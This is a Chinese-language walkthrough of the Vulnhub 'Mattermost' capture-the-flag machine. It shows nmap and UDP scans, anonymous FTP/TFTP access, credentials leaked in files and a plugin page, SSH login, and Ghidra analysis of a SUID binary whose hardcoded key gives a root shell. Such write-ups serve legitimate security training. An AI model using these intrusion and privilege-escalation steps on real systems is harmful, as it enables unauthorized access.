Vulnhub之Mattermost靶机详细测试过程
Mattermost
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.151 00:0c:29:07:65:9f 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
利用Kali Linux的netdiscover工具识别目标主机的IP地址为10.1.1.151
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.151 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 05:59 EST
Nmap scan report for bogon (10.1.1.151)
Host is up (0.0014s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.1.1.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e98be3460ec17fa21ac3df9d4654ad1c (RSA)
| 256 ff5b256809f5452b146866e0ce0027b3 (ECDSA)
|_ 256 bbded2db03b75ccfd73bb72165215de3 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Sorry, This Page Can't Be Accessed
|_http-server-header: Apache/2.4.29 (Ubuntu)
3389/tcp open ms-wbt-server xrdp
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3657
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.segment.com/analytics.js/
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sat, 25 Feb 2023 10:55:17 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: ntnkbqycxpy8jj9ig6xbyhttfo
| X-Version-Id: 5.18.0.5.18.0.12da442d30d70d8726b0a9761a350d5a.false
| Date: Sat, 25 Feb 2023 10:59:18 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0'>
| <meta name='robots' content='noindex, nofollow'>
| <meta name='referrer' content='no-referrer'>
| <title>Mattermost</title>
| <meta name='mobile-web-app-capable' content='yes'>
| <meta name='application-name' content='Mattermost'>
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Sat, 25 Feb 2023 10:59:18 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ftp 10.1.1.151
Connected to 10.1.1.151.
220 (vsFTPd 3.0.3)
Name (10.1.1.151:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||33940|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 06 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jan 06 2020 ..
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||39765|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 06 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jan 06 2020 ..
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||26272|)
550 Permission denied.
ftp> quit
221 Goodbye.
-
目标主机FTP不允许匿名访问
-
匿名用户不允许上传文件
-
FTP服务版本没有可利用的漏洞
对于端口80以及8065进行目录扫描,一无所获,根据他人的做法,是进行UDP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo nmap -sU -A -T4 10.1.1.151
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 06:22 EST
Nmap scan report for bogon (10.1.1.151)
Host is up (0.00047s latency).
All 1000 scanned ports on bogon (10.1.1.151) are in ignored states.
Not shown: 921 closed udp ports (port-unreach), 79 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:07:65:9F (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms bogon (10.1.1.151)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1453.15 seconds
并没有扫描出TFTP服务,但是别的人扫出来了,看来UDP扫描确实不可靠
──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ tftp 10.1.1.151
tftp> ls
?Invalid command
tftp> ?
tftp-hpa 5.2
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
literal toggle literal mode, ignore ':' in file name
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet transmission timeout
timeout set total retransmission timeout
? print help information
help print help information
tftp> get ?
Error code 1: File not found
tftp> get README.md
tftp> quit
在网站首页有提示:
The README.md file contains information about other softwares, files in a directory or archive of computer software.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ cat README.md
Hello Admin,
Please use the following key: ComplexPassword0!
利用该密码成功登录8065后台
登录后发现帖子中多次出现不同形式的zoom,意味着有古怪,到system console, 看到有zoom插件,将其启用,此时出现一个url:
http://localhost/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html
经Localhost改为10.1.1.151
访问该url:
http://10.1.1.151/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html
Hello Admin, FTP credentials help you edit, transfer and delete files from your site. This is why it's important to keep these credentials handy. FTP Credentials: ftpuser / ftppassword Make sure to keep these to yourself.
从而得到ftp的用户名和密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ftp 10.1.1.151
Connected to 10.1.1.151.
220 (vsFTPd 3.0.3)
Name (10.1.1.151:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||16561|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 4 ftp ftp 4096 Jan 05 2020 ..
-rw-r--r-- 1 ftp ftp 220 Jan 05 2020 .bash_logout
-rw-r--r-- 1 ftp ftp 3771 Jan 05 2020 .bashrc
-rw-r--r-- 1 ftp ftp 807 Jan 05 2020 .profile
-rw-r--r-- 1 ftp ftp 8980 Jan 05 2020 examples.desktop
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 users
226 Directory send OK.
ftp> pwd
Remote directory: /home/ftpuser
ftp> cd ..
250 Directory successfully changed.
ftp> pwd
Remote directory: /home
ftp> ls -alh
229 Entering Extended Passive Mode (|||56868|)
150 Here comes the directory listing.
drwxr-xr-x 4 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 24 ftp ftp 4096 Jan 01 2020 ..
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 ftpuser
drwxr-xr-x 18 ftp ftp 4096 Jan 06 2020 mattermost
226 Directory send OK.
ftp> cd mattermost
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||62256|)
150 Here comes the directory listing.
drwxr-xr-x 18 ftp ftp 4096 Jan 06 2020 .
drwxr-xr-x 4 ftp ftp 4096 Jan 05 2020 ..
-rw------- 1 ftp ftp 1590 Jan 05 2020 .ICEauthority
-rw------- 1 ftp ftp 4615 Jan 06 2020 .bash_history
-rw-r--r-- 1 ftp ftp 220 Dec 31 2019 .bash_logout
-rw-r--r-- 1 ftp ftp 3771 Dec 31 2019 .bashrc
drwx------ 16 ftp ftp 4096 Jan 05 2020 .cache
drwx------ 11 ftp ftp 4096 Dec 31 2019 .config
drwx------ 3 ftp ftp 4096 Jan 05 2020 .dbus
drwx------ 3 ftp ftp 4096 Dec 31 2019 .gnupg
drwx------ 2 ftp ftp 4096 Jan 05 2020 .gvfs
drwx------ 3 ftp ftp 4096 Dec 31 2019 .local
drwx------ 5 ftp ftp 4096 Dec 31 2019 .mozilla
-rw------- 1 ftp ftp 18 Dec 31 2019 .mysql_history
-rw-r--r-- 1 ftp ftp 807 Dec 31 2019 .profile
drwx------ 3 ftp ftp 4096 Jan 03 2020 .ssh
-rw-r--r-- 1 ftp ftp 0 Dec 31 2019 .sudo_as_admin_successful
-rw------- 1 ftp ftp 17420 Jan 06 2020 .viminfo
drwxr-xr-x 2 ftp ftp 4096 Jan 02 2020 Desktop
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Documents
drwxr-xr-x 2 ftp ftp 4096 Jan 03 2020 Downloads
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Music
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Pictures
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Public
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Templates
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2019 Videos
-rw-r--r-- 1 ftp ftp 8980 Dec 31 2019 examples.desktop
226 Directory send OK.
ftp> cd .ssh
550 Failed to change directory.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||45756|)
150 Here comes the directory listing.
drwxr-xr-x 4 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 24 ftp ftp 4096 Jan 01 2020 ..
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 ftpuser
drwxr-xr-x 18 ftp ftp 4096 Jan 06 2020 mattermost
226 Directory send OK.
ftp> cd ftpuser
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||27640|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 4 ftp ftp 4096 Jan 05 2020 ..
-rw-r--r-- 1 ftp ftp 220 Jan 05 2020 .bash_logout
-rw-r--r-- 1 ftp ftp 3771 Jan 05 2020 .bashrc
-rw-r--r-- 1 ftp ftp 807 Jan 05 2020 .profile
-rw-r--r-- 1 ftp ftp 8980 Jan 05 2020 examples.desktop
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 users
226 Directory send OK.
ftp> cd users
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18444|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 ..
drwxr-xr-x 2 ftp ftp 4096 Jan 05 2020 mattermost
226 Directory send OK.
ftp> cd mattermost
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58599|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 05 2020 .
drwxr-xr-x 3 ftp ftp 4096 Jan 05 2020 ..
-rw-r--r-- 1 ftp ftp 11 Jan 05 2020 message
226 Directory send OK.
ftp> get message
local: message remote: message
229 Entering Extended Passive Mode (|||24960|)
150 Opening BINARY mode data connection for message (11 bytes).
100% |****************************************************************************************************************| 11 21.22 KiB/s 00:00 ETA
226 Transfer complete.
11 bytes received in 00:00 (12.94 KiB/s)
ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ cat message
Welcome!!!
而且从ftp知道另一用户名是mattermost,可能Welcome!!!就是其密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ssh mattermost@10.1.1.151
The authenticity of host '10.1.1.151 (10.1.1.151)' can't be established.
ED25519 key fingerprint is SHA256:f6h3XXHqKJMC9IrcBCv4Wg4VKZsnkE+S/I4L76lsg2w.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.151' (ED25519) to the list of known hosts.
mattermost@10.1.1.151's password:
Permission denied, please try again.
mattermost@10.1.1.151's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.0.0-37-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Mon Jan 6 00:59:59 2020
mattermost@ubuntu:~$ id
uid=1000(mattermost) gid=1000(mattermost) groups=1000(mattermost),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare),130(ftp)
mattermost@ubuntu:~$ sudo -l
[sudo] password for mattermost:
Sorry, user mattermost may not run sudo on ubuntu.
mattermost@ubuntu:~$
mattermost@ubuntu:~/Desktop$ find / -perm -4000 -type f 2>/dev/null
提权
mattermost@ubuntu:~/Desktop$ cat README.md
Hello User,
Your secret key is 48912.
Do not share this key with anyone.
!! NOTE:: This key is not valid after 30 days and has been changed by our internal systems.
!! NOTE:: Please contact the support desk to get new secret key.
mattermost@ubuntu:~/Desktop$ ./secret
Hello Admin, Please enter the secret key:
48912
Your is either invalid or expired
.mattermost@ubuntu:~/Desktop$
发现secret文件有SUID位,将其下载到Kali Linux本地
──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ wget http://10.1.1.151:8000/secret
--2023-02-25 08:04:40-- http://10.1.1.151:8000/secret
Connecting to 10.1.1.151:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8584 (8.4K) [application/octet-stream]
Saving to: ‘secret’
secret 100%[=========================================================================>] 8.38K --.-KB/s in 0s
2023-02-25 08:04:40 (172 MB/s) - ‘secret’ saved [8584/8584]
下载到Kali Linux本地后用ghidra工具对secret程序反编译,其中可以看到main函数:
undefined8 main(void)
{
long in_FS_OFFSET;
int local_14;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_14 = 0;
puts("Hello Admin, Please enter the secret key:");
__isoc99_scanf(&DAT_00100992,&local_14);
if (local_14 == 0xf447) {
setuid(0);
setgid(0);
system("/bin/bash");
}
else {
printf("Your is either invalid or expired\n.");
}
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
从反编译后得到代码可知,当时输入secret key后,会有个比较,也就是说我们输入的secret key与0xf447相比较,用echo命令将0xf447转换为十进制(或者随便找个在线网站对其进行转换)
──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ echo $((0xf447))
62535
这样就得到了62535,然后在靶机上运行/secret,key为62535
mattermost@ubuntu:~/Desktop$ ./secret
Hello Admin, Please enter the secret key:
62535
root@ubuntu:~/Desktop# cd /root
root@ubuntu:/root# ls -alh
total 40K
drwx------ 5 root root 4.0K Jan 6 2020 .
drwxr-xr-x 24 root root 4.0K Jan 1 2020 ..
-rw------- 1 root root 265 Jan 5 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Aug 5 2019 .cache
drwxrwxr-x 2 root root 4.0K Jan 6 2020 Desktop
drwx------ 3 root root 4.0K Dec 31 2019 .gnupg
-rw------- 1 root root 168 Dec 31 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 0 Jan 2 2020 .sudo_as_admin_successful
-rw------- 1 root root 2.4K Jan 5 2020 .viminfo
root@ubuntu:/root# cd Desktop/
root@ubuntu:/root/Desktop# ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Jan 6 2020 .
drwx------ 5 root root 4.0K Jan 6 2020 ..
-rw-rw-r-- 1 root root 23 Jan 6 2020 local.txt
root@ubuntu:/root/Desktop# cat local.txt
are2020nehoc0601Great!
从而拿到了Root Shell,和Root flag
STRIVE FOR PROGRESS,NOT FOR PERFECTION
